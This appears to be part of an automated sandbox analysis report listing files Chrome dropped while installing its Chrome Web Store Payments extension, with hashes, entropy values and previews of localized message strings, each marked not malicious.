                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):636
                                                                                                                                                            Entropy (8bit):4.646901997539488
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJbiVbGGbiVb+WYpU34OBHlBi9+dgQUg6O8ZpU34bdbfiIu03OyZnLAOfTYR5k:1HE5iVauiV6WYpIAYr8ZpxFiaOGAOfIC
                                                                                                                                                            MD5:0E6194126AFCCD1E3098D276A7400175
                                                                                                                                                            SHA1:E8127B905A640B1C46362FA6E1127BE172F4A40F
                                                                                                                                                            SHA-256:E2699F98C511B18A2AFB82EAE9A4804B646C4FF1077D80E77C17A3943A6373C2
                                                                                                                                                            SHA-512:A71F7C7BFBBF1E37E699601AF2E095C56CBA91F90CB7556477DF31D01B83ADFB1271E1775C9BA299FF6875BBFC2B6AB47488CC88E33DEF2F6F2E0E5AC687B777
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "app_name": {.. "message": "P.atno.ci w sklepie Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplikacja jest obecnie niedost.pna.".. },.. "craw_connect_to_network": {.. "message": "Po..cz si. z sieci..".. },.. "iap_unavailable": {.. "message": "P.atno.ci w ramach aplikacji s. teraz niedost.pne.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Zaloguj si. w Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):636
                                                                                                                                                            Entropy (8bit):4.515158874306633
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJsc/bGGsc/b+WYpU34OLw+dgn/KzO8ZpU34FjIBMwGRO03OyZnLAOfTYN+KcY:1HEb/a8/6WYp4mZ8Zp7cKlOGAOf2tD
                                                                                                                                                            MD5:86A2B91FA18B867209024C522ED665D5
                                                                                                                                                            SHA1:63DEC245637818C76655E01FCB6D59784BC7184E
                                                                                                                                                            SHA-256:6374880FDD1F8AF1EE8AEA6A06B73BE0AB265AFCEB4FE6F08BDE3B3989264B21
                                                                                                                                                            SHA-512:DA6DBDE5028756421C2904F605632EE98831A25A1247E6238A931629B94CE8A00FD76F4235F118D2167304BD60F2C06B2AD78E54FF6CE53F8C38DF8C7B5AFCE4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pagamentos da Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos da Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplicativo indispon.vel no momento.".. },.. "craw_connect_to_network": {.. "message": "Conecte-se a uma rede.".. },.. "iap_unavailable": {.. "message": "No momento, os Pagamentos no aplicativo n.o est.o dispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Fa.a login no Google Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):622
                                                                                                                                                            Entropy (8bit):4.526171498622949
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJsZUkbGGsZUkb+WYpU34OAE+dgqxKzO8ZpU34rEpBfvPO03OyZnLAOfTYLD:1HEmUka5Uk6WYpFvdxZ8ZpSTnPlOGAOS
                                                                                                                                                            MD5:750A4800EDB93FBE56495963F9FB3B94
                                                                                                                                                            SHA1:8BFB915488A4EB3CB33D68E2E59F1F8447DB7D61
                                                                                                                                                            SHA-256:C1C94F65FABAF17DEF98A8587711A56D61B1E5607500E9B01F2824DB109F9E83
                                                                                                                                                            SHA-512:2AEDEF5793406221BE76AF22031CE8C30AB5FAEAED09BB394C153E2EBE990C89C1A2A73B40D8A92842641AFCA8C77FFD808A2058602D3646FD8DAE2844406F24
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pagamentos via Chrome Web Store".. },.. "app_name": {.. "message": "Pagamentos via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Aplica..o atualmente indispon.vel.".. },.. "craw_connect_to_network": {.. "message": "Ligue-se a uma rede.".. },.. "iap_unavailable": {.. "message": "Os Pagamentos na app est.o atualmente indispon.veis.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicie sess.o no Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):641
                                                                                                                                                            Entropy (8bit):4.61125938671415
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJqJrJZGGqJrJZ+WYpU344HIx2Z+dgrVPlZO8ZpU34qT7hI3O03OyZnLAOfTYU:1HEC4D8WYpKow8WV68ZpKhoOGAOfoVGD
                                                                                                                                                            MD5:98D43E4B1054A65DF3FA3CC40AB6FB6D
                                                                                                                                                            SHA1:46E0A21C4DA2BB5D4D8F837AE211C1B6FA26E7E2
                                                                                                                                                            SHA-256:113A13900CBA62FE8AED06751971C23A80A99B47F9BE219CF884D57DB19611D9
                                                                                                                                                            SHA-512:A76DC53912A4F46714926B9EA2B22E909540E447F61F6DD72607AB7B3BB5D4A9B39E525B04C33AEC53BA813D14AC1FB5827275B2524E52B693E83171E1CD1466
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "app_name": {.. "message": "Pl..i prin Magazinul web Chrome".. },.. "craw_app_unavailable": {.. "message": ".n prezent, aplica.ia nu este disponibil..".. },.. "craw_connect_to_network": {.. "message": "Conecteaz.-te la o re.ea.".. },.. "iap_unavailable": {.. "message": "Pl..ile .n aplica.ie nu sunt disponibile momentan.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Conecteaz.-te la Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):744
                                                                                                                                                            Entropy (8bit):4.918620852166656
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ7OJHZMSl3ZGG7OJHZMSl3Z+WYpU34zWJ2F+dgVtLSv/TO8ZpU347NWjT03On:1HElOJHZMq4uOJHZMq8WYpdWJ/YGHq8m
                                                                                                                                                            MD5:DB2EDF1465946C06BD95C71A1E13AE64
                                                                                                                                                            SHA1:FB4F3ECE9ECECEBBC6CA2A592A15FB9C1FDFB811
                                                                                                                                                            SHA-256:FBAF22CE6E16DE174CED8CB5EA3098CCA1C3426A2111FF33BD3E64DA64ED67AB
                                                                                                                                                            SHA-512:4E0CF00BAEF1757548DEB17BBE1AF55770A0A0F7351779EF55C7DEFA6D112D0227B8865C2C22E0EC62E6E2F1C8E1632A2D0CE6828D25C5ABBF143C990116F632
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "......... ....... ........-........ Chrome".. },.. "app_name": {.. "message": "......... ....... ........-........ Chrome".. },.. "craw_app_unavailable": {.. "message": ".......... ...........".. },.. "craw_connect_to_network": {.. "message": "............ . .....".. },.. "iap_unavailable": {.. "message": "....... ..... .......... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "....... . Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sk\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):647
                                                                                                                                                            Entropy (8bit):4.640777810668463
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJfZGGfZ+WYpU34ORO+dgmmCO8ZpU34yH7u2Z03OyZnLAOfTYCUAi0D:1HEl4G8WYpetPmD8ZpcH7aOGAOfzUeD
                                                                                                                                                            MD5:8DF215D1EFBDABB175CCDD68ED8DCB0A
                                                                                                                                                            SHA1:2B374462137A38589A73FDD00A84CBDC7E50F9F4
                                                                                                                                                            SHA-256:7FA16AF97E6CFC52EC6008EB679D3F30E7E0C24F9EF2D18A9228EAF4DED9D63B
                                                                                                                                                            SHA-512:C0E623343BDAEB4731800D183B59F2FCFE285F0C7153EC99641FD84F2F2DCFE47D21E73F3D28B1240340453C5668EB0AFFBE087AAB62F1C88CD2A40CC44E599D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sl\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):617
                                                                                                                                                            Entropy (8bit):4.5101656584816885
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJGcyvmbZGGGcyvmbZ+WYpU34OBOEtf+dgca1ZO8ZpU34GcQArERff03OyZnLh:1HE4cyY4TcyY8WYpNoWa1w8ZpQcQ6AfK
                                                                                                                                                            MD5:3943FA2A647AECEDFD685408B27139EE
                                                                                                                                                            SHA1:0129DD19D28373359530B3B477FE8A9279DABB7D
                                                                                                                                                            SHA-256:18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
                                                                                                                                                            SHA-512:42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):743
                                                                                                                                                            Entropy (8bit):4.913927107235852
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJssbdOGGssbdO+WYpU347xBP+dgcucO8ZpU34s1muP03OyZnLAOfTYzDYD:1HEKsb59sbTWYplx4Xud8Zpy1mNOGAOv
                                                                                                                                                            MD5:D485DF17F085B6A37125694F85646FD0
                                                                                                                                                            SHA1:24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
                                                                                                                                                            SHA-256:7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
                                                                                                                                                            SHA-512:0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\sv\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):630
                                                                                                                                                            Entropy (8bit):4.52964089437422
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJJMkbGGJMkb+WYpU34OACwz+dgNPGFZO8ZpU34JgpXLSb03OyZnLAOfTYLdID:1HErMkaqMk6WYpTOcb8ZpDgdZOGAOf8Y
                                                                                                                                                            MD5:D372B8204EB743E16F45C7CBD3CAAF37
                                                                                                                                                            SHA1:C96C57219D292B01016B37DCF82E7C79AD0DD1E8
                                                                                                                                                            SHA-256:B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
                                                                                                                                                            SHA-512:33640529E0D5DCC5CA4BDB0615A2818E8D26C6FCB7B3474C08AC3EB67B9DB40E1F0A79954ED20728CD47A686D2533DCBC76ABCBDB917F8530C8DE8BBA687352E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Betalning via Chrome Web Store".. },.. "app_name": {.. "message": "Betalning via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Appen .r inte tillg.nglig f.r tillf.llet.".. },.. "craw_connect_to_network": {.. "message": "Anslut till ett n.tverk.".. },.. "iap_unavailable": {.. "message": "Betalning i appen .r inte tillg.ngligt f.r n.rvarande.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logga in i Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):945
                                                                                                                                                            Entropy (8bit):4.801079428724355
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HEKa1dDa1/WYp6UFi72SmlG8ZpyactrW2SAOGAOfvSLD:WK2DNYp6U4y3bpyLxwGFW
                                                                                                                                                            MD5:83E2D1E97791A4B2C5C69926EFB629C9
                                                                                                                                                            SHA1:429600425CB0F196DDD717F940E94DBD8BFF2837
                                                                                                                                                            SHA-256:2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
                                                                                                                                                            SHA-512:60A5928DAA8CB4341487F477C56B5A98B83EDE50E5F4F55A802E01FDDAB86F3E795D391953D3D9214552D14D3F58C5A183693C613720FC12FC387D7B8F9B9AB6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "............... Chrome .........".. },.. "app_name": {.. "message": "............... Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".............................".. },.. "craw_connect_to_network": {.. "message": ".........................".. },.. "iap_unavailable": {.. "message": "...............................................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "................. Chrome".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):631
                                                                                                                                                            Entropy (8bit):4.710869622361971
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ9Y8GG9Y8+WYpU34wWT+dgGb0GO8ZpU34wryd7T03OyZnLAOfTYGbPKG:1HE0jWYpyRnG8Zpyr/OGAOfFPn
                                                                                                                                                            MD5:2CEAE0567B6BB1D240BBAD690A98CA3B
                                                                                                                                                            SHA1:5944346FBD4A0797B13223895995CAB58E9ECD23
                                                                                                                                                            SHA-256:A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
                                                                                                                                                            SHA-512:108A07C6D03D7178E8D0FFEF5349E0249A898D864964FED8757BD8A08BC1C6D9613F2A6C01AA34A6606127D1C6CE14C229FA02586677DBB060B85E3E845950E1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "app_name": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "craw_app_unavailable": {.. "message": "Uygulama .u anda kullan.lam.yor.".. },.. "craw_connect_to_network": {.. "message": "L.tfen bir a.a ba.lan.n.".. },.. "iap_unavailable": {.. "message": "Uygulama ..i .demeler .u anda kullan.lamaz.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.tfen Chrome'da oturum a..n.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):720
                                                                                                                                                            Entropy (8bit):4.977397623063544
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ7wILkSlXZGG7wILkSlXZ+WYpU34zb1Oy2P+dgSV1EjiTO8ZpU347qtfP2CTW:1HElwEkK4uwEkK8WYpd/dTV1e8Zptq5S
                                                                                                                                                            MD5:AB0B56120E6B38C42CC3612BE948EF50
                                                                                                                                                            SHA1:8B3F520E5713D9F116D68E71DAEED1F6E8D74629
                                                                                                                                                            SHA-256:68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
                                                                                                                                                            SHA-512:CD852A58217F739C1CD58567FF432D31A7AD3F68C884ABBA1DA95799BCD1545C6A5D3B06F319681C12B78AD0A709828DE4B22736316F148D21F5DB76A5BCCBEF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "....... ...-........ Chrome".. },.. "app_name": {.. "message": "....... ...-........ Chrome".. },.. "craw_app_unavailable": {.. "message": "........ ......... ...........".. },.. "craw_connect_to_network": {.. "message": "............. .. .......".. },.. "iap_unavailable": {.. "message": "....... ..... ........ ..... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "........ . Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):695
                                                                                                                                                            Entropy (8bit):4.855375139026009
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJMAZrSFZGGMAZrSFZ+WYpU34WFHoz+dgdklzoO8ZpU34NFHoz03OyZnLAOfTU:1HEI4B8WYpAKytFZ8ZpXKMOGAOfd6D
                                                                                                                                                            MD5:7EBB677FEAD8557D3676505225A7249A
                                                                                                                                                            SHA1:F161B4B6001AEAEAB246FF8987F4D992B48D47BE
                                                                                                                                                            SHA-256:051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
                                                                                                                                                            SHA-512:74FD267CF7E299FB8E7054605C3F651F057F676FF865082FA24F4916755456768DB0DA62DBC515D829B48AB1F9CFC8AD3E841DCBF1F194D5CB14C5335A192A0D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "app_name": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "craw_app_unavailable": {.. "message": ".ng d.ng hi.n kh.ng kh. d.ng.".. },.. "craw_connect_to_network": {.. "message": "Vui l.ng k.t n.i v.i m.ng.".. },.. "iap_unavailable": {.. "message": "Thanh to.n trong .ng d.ng hi.n kh.ng kh. d.ng.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Vui l.ng ..ng nh.p v.o Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):595
                                                                                                                                                            Entropy (8bit):5.210259193489374
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ01GG01+WYpU34zeHz+dgfO8ZpU34YKiO03OyZnLAOfTYB6U:1HEpIWYpISv8Zp+JOGAOfa6U
                                                                                                                                                            MD5:BB73BF561BB79F89D9BF7C67C5AE5C65
                                                                                                                                                            SHA1:2FADD3A1959B29C44830033A35C637D0311A8C9C
                                                                                                                                                            SHA-256:D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
                                                                                                                                                            SHA-512:627D44CEF1FE5C5ABD598BD47FF5E22B9EFC1CF98DDE3868FA9E5896C134A0C9C055AC34EDDADAE56B6690E51AEA89965D38F770552A85C732CC796795DC68D2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome .........".. },.. "app_name": {.. "message": "Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".........".. },.. "craw_connect_to_network": {.. "message": ".......".. },.. "iap_unavailable": {.. "message": "............".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):634
                                                                                                                                                            Entropy (8bit):5.386215984611281
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HEJ2j62GG2j62+WYpU34m7T+dgc8nOO8ZpU34mvIO03OyZnLAOfTYAuH:1HEuSZCWYpsStwP8ZpROGAOfCH
                                                                                                                                                            MD5:5FF50C673CC0C661D615F0CFD0E6DCA0
                                                                                                                                                            SHA1:60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85
                                                                                                                                                            SHA-256:C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
                                                                                                                                                            SHA-512:361D62D91F4931C5F34092C9F2C6A5323D5EEB82A24E7ABE11F7817D8D66341C0ECAD4DCB4B10873920C8D6A3CC9F5704889E178EB2549001A9F62BEDF6C8019
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "app_description": {.. "message": "Chrome ............".. },.. "app_name": {.. "message": "Chrome ............".. },.. "craw_app_unavailable": {.. "message": ".............".. },.. "craw_connect_to_network": {.. "message": "......".. },.. "iap_unavailable": {.. "message": "................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):7780
                                                                                                                                                            Entropy (8bit):5.791315351651491
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:RktDNJ2UzsL5KcASyoH+CouKP/iNGRo/oRHMIT:AZQflcsU
                                                                                                                                                            MD5:0834821960CB5C6E9D477AEF649CB2E4
                                                                                                                                                            SHA1:7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
                                                                                                                                                            SHA-256:52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
                                                                                                                                                            SHA-512:9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2508_592473310\CRX_INSTALL\craw_background.js

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):544643
                                                                                                                                                            Entropy (8bit):5.385396177420207
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:abyfBNC2FRdjiRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+h72W3GB0n:Ft/g
                                                                                                                                                            MD5:6EEBED29E6A6301E92A9B8B347807F5F
                                                                                                                                                            SHA1:65DFB69B650560551110B33DCBA50B25E5B876DE
                                                                                                                                                            SHA-256:04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
                                                                                                                                                            SHA-512:FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
